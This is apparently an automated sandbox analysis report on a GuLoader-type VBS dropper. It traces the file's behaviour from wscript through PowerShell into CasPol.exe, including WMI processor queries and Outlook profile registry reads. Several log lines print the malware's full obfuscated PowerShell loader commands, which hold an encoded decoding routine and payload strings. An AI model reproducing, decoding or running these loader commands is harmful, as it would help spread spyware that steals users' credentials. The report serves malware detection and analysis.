$var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Bichloride.vbs" Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5elcf2ed.d41.ps1 Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winVBS@16/7@22/4
Source: C:\Windows\System32\wscript.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\97c421700557a331a31041b81ac3b698\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:120:WilError_03
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe Mutant created: \Sessions\1\BaseNamedObjects\-0NDOIW
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7972:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8184:304:WilStaging_02
Source: unknown Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\IMG_2022028022-0120.vbs"
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior

Data Obfuscation
barindex
Yara detected GuLoader
Source: Yara match File source: 0000000D.00000000.3773940652.0000000000E00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Obfuscated command line found
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeAT
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Badeanstalt = """reFLiuEfnBrcExtApiHjoStnBu HyHFlTDuBSp su{Hi Cl An Pa BapinaCarZiaSomVo(Cz[PaSDetalrCaiennOugDe]Ca`$UdHBaSUd)Fr;Ag At Ud Ho Af`$UsBeuyAktNoePasBo Sa=Sn ThNAneNowBo-MuOGrbEpjLoeDdcBetHu TobPayVrtSeeLa[Al]Po Bd(Me`$VaHTnSDe.ReLPeeNonVegMatunhSl Re/Sk Di2Gi)Ko;Un ge Ma Is GeFFloLerWi(fe`$HaiOp=om0Pe;Fu Ma`$PhiDo Ge-MaltitSe Fa`$SyHBeSBa.DoLUneDenScgDotUnhCa;Do Un`$reiom+Re=Be2Du)Va{Fl Pl Re Ad Ot ta Sp Sk Ho`$DoBFeyDetLeegasSm[Fi`$geiAf/na2De]Od Ge=Sa Tr[RecSkoUnnLivKresirOrtBr]Il:Me:DaTDioDiBBoyPatGleSu(Po`$UsHHeSPh.boSFruAfbNesMatUnrPriPonUngLa(Il`$StiPa,Su Jo2Po)Ca,Bl Af1Sn6Du)No;Ma Te Un`$miBKryPrtCheGtsPa[Du`$SyiUn/Tr2Fi]Mi Ta=Ha Ah(Fo`$SiBbiyIntOpeovsOl[Kb`$spiHe/Ar2Fr]Fe Ci-FrbRexEnoPhrTi Hy2St2Re9La)lo;so Le De Ca Vr}Re Un[MuSkutSqrLaiApnNogBl]Pe[MaSChyInsDetpaeNemSt.VaTBaeKaxIbtBi.ReEManPlcGeourdPriMonPrgSy]Si:Ko:RaAUdSAkCWaIFoIsa.MoGBaeButTaSGutUnrFriUlnIngBa(Ba`$FobSeyPitTheAnsId)li;Bl}Ga`$DeHBrdSalUncIr0Sk=KrHOuTBeBAf Ry'BeBRe6te9SpCBe9Be6Pr9Gr1js8Et0Am8In8SeCEnBCa8co1In8Ta9Pr8Cr9De'Sy;Lu`$plHRvdaflFocIn1De=TrHDiTZiBVe Un'FeAKr8Re8TaCDe8Sl6Gr9Ag7is8XyASv9Sp6Sh8CaAHe8De3Bl9An1unCTiBteBAb2Ha8SmCUr8SuBCuDbu6LkDTi7MaCMeBSeBDe0As8TrBCh9Ah6Me8To4Pr8Ne3Fr8In0boAReBRa8st4Ti9Ve1un8ApCOp9dk3Bi8Co0SuACl8An8en0Un9In1Mo8DeDAn8PeAUd8Wu1Ra9Ca6Ba'Fo;El`$LoHBldNolSucBo2Ne=TnHBlTUnBSp Ne'siAFi2Sk8Ti0Di9Ul1tyBLo5Ob9Fi7no8ByACe8An6PoALa4Da8Bi1Ka8Im1Wh9Gt7lo8Ge0Rr9Br6Br9Di6Ar'Fl;gr`$CyHEidArlblcPr3pr=OvHenTnoBCo Ta'LeBUn6re9UpCGu9Sn6Gn9Fa1Br8Mo0Da8Pr8LyCOvBBeBwa7Sk9Fo0Sa8MaBDe9Ev1Af8KaCBa8Oc8Sc8He0NoCObBFoAToCDe8SiBSi9Se1Be8Or0Se9No7Fl8HuAOu9ty5RaBCo6Kr8Sk0dd9Se7As9Ri3Le8laCBr8we6Ou8Di0oc9Be6DaCKaBTeAUnDPu8Se4St8IsBEr8si1Ja8Ng9Li8Sp0FoBDi7Ci8Ex0Vi8st3sl'Sk;De`$FlHPedJalJdcTi4Ki=KlHStTPrBFo Ge'Th9fi6Af9Sy1Af9Re7He8CrCWi8FoBSt8Ov2Be'Bl;Al`$AnHIndaclFocBu5Ta=OvHDeTWhBUn Ca'UdADe2Sy8Pi0In9Af1CaARi8Ha8PrAno8Sl1Py9Du0Gn8Ki9Ud8Po0MuAUnDNe8No4Ud8EpBAc8vi1Bj8Sp9St8Op0An'Af;Se`$OrHBydGrlCicFo6hm=CeHSkTInBHa Di'FaBIn7ApBin1waBbe6Em9Re5sa8No0Wo8Ai6mi8MiCBa8Pa4Sh8El9NoAStBFo8Un4Ko8Om8Lo8Ro0StCfo9ChCco5SyAJuDAg8AfCCo8In1Ps8In0FrAMi7Se9LaCTaBBr6er8TiCAp8Hu2PoCEp9SuCLo5miBRe5Ps9No0Wa8Ko7St8Sa9po8FuCCr8Eg6No'in;Hu`$InHCadUdlRocSt7mi=ReHPrTroBZe da'NeBPa7Ri9Di0Un8chBgn9Ea1Ku8SkCMe8Pr8Su8Di0OvCKa9MoCSa5SwAUd8Un8Bl4si8DiBLy8Un4ur8Gl2Fa8Fi0wh8Ne1Sc'Wa;Dd`$DeHOpdSelNocAz8Tr=ByHDiTSiBPy ev'AvBUn7Di8tr0Om8In3Ma8Fr9pr8ud0Pr8Fe6Tr9Br1Sl8Mi0Gr8In1biAVe1Hy8Sv0Ur8Hv9Pl8Bl0Kl8Ph2Ni8Se4Fa9Fy1Xy8ch0Na'Sa;Dr`$CoHAfdDolVocEn9nd=PiHKoTAsBEf In'PsAPrCGl8MuBFeATa8Fo8Kp0Un8Re8Co8UnAMe9Bl7At9GlCFoAFr8ny8ElAMi8Ek1Fy9St0Ek8Mi9He8Vr0Me'Re;Sv`$ReSActInyKarRekGoeArtunrHynWaeMu0Ov=InHAlTEtBBo Sk'SkAde8Sh9DeCPrASh1Ri8Sc0Va8Re9Ko8Co0sc8Da2St8Af4By9Sy1mi8Af0SuBHo1St9FeCfl9An5Ma8Ob0Cl'tr;Fo`$beSBatDiyAnrSukReeWatOprSunTheSt1Ch=AsHBeTLiBSk Le'SpAma6hs8mo9No8Da4Ha9Sa6ve9Po6stCUn9KoCNe5EnBSq5Pi9St0lo8Rn7Ch8Tw9Ud8BrCHy8fo6UnCfu9roCPh5PrBPa6Tm8Fe0Mi8Or4bl8Pr9Ra8Fa0Pr8Us1GlCLy9 Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu 